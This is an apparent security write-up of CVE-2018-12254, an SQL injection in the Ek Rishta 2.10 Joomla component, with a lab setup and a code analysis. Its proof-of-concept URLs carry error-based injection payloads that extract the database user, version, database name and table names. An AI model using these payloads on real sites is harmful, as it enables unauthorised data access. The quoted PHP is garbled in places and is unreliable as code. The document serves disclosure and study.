CVE-2018-12254 Joomla Component Ek Rishta 2.10 – SQL Injection | Lucideus


Introduction
Joomla! is an independent and open-source content management system (CMS) for publishing web content. It is built on a model–view–controller web application framework which can be used separately for the CMS.
A component is a kind of Joomla extension. Components are the necessary functional units of Joomla. When a content is created by a component, the content is usually portrayed in the center of the content area of the specified template depending on which template is being used. Here, the router.php in the Harmis Ek Rishta 2.10 component for Joomla allows SQL injection via the PATH_INFO to a home/requested_user/Sent%20interest/ URI having a Common Vulnerability Exposure Number CVE-2018-12254 and Exploit-DB ID - 44893.

Exploitation Lab Environment
  • Joomla! CMS 3.7.0 (Hosted on Windows 10 Microsoft Windows [Version 10.0.17134.112]). Download Link.
  • Harmis Ek Rishta 2.10 Component. Download Link.
  • Firefox Quantum 60.0.2 (64-bit).
 Proof Of Concept
  • Firstly, need to visit the "My Profile" of the Harmis Ek Rishta extension. Here the username for the profile is T3raByt3.

  • After visiting, on the page, perform the following SQL injections.
    • http://host/joomla/index.php/ek-rishta-profile/requested_user/Sent interest/
    • http://host/joomla/index.php/ek-rishta-profile/requested_user/Sent interest/1’
 
    • http://host/joomla/index.php/ek-rishta-profile/requested_user/Sent interest/1' or extractvalue(1,user()) #

    • http://host/ joomla/index.php/ek-rishta-profile/requested_user/Sent interest/1' or extractvalue(1,version()) #

    • http://host/joomla/index.php/ek-rishta-profile/requested_user/Sent interest/1' or extractvalue(0x0a,concat(0x0a,(select database()))) #
 
      • http://host/joomla/index.php/ek-rishta-profile/requested_user/Sent interest/1' or extractvalue(0x0a,concat(0x0a,(select table_name from information_schema.tables))) #

    Vulnerability Analysis
    Also, after examining the router.php (code fragment below), it is seen that $ c_id  is capturing the segment that is the username & submitting it to an array ($ vars),it can be concluded that the EkrishtaUsrID () function is searching for the id or the name of the user in the dedicated database.
    if (! Empty ($ segments [2]) && $ segments [0] == 'requested_user') {
    $ c_id = EkrishtaUsrID ($ segments [2]);
    if ($ segments [1] == "Sent interest")
    $ vars ['rid'] = $ c_id;
    else
    $ vars ['cid'] = $ c_id;
    }
    From that, further after searching for EkrishtaUsrID() function, it can be seen that the SQL injection is taking place because of the lack of validation checks in the line of code marked Red Color.
    function EkrishtaUsrName ($ uid)
    {
    $ db = JFactory :: getDBO ();
    $ sql = "SELECT` username` FROM #__users WHERE `id` = '". .
    $ db-> setQuery ($ sql);
    return $ db-> loadResult ();
    }

    function EkrishtaUsrID ($ uid_name)
    {
    $ db = JFactory :: getDBO ();
    $ sql = "SELECT` id` FROM #__users WHERE `username` = '". $ Uid_name. "'";
    $ db-> setQuery ($ sql);
    return $ db-> loadResult ();
    }

                                                                                PoC Video



    Reference Links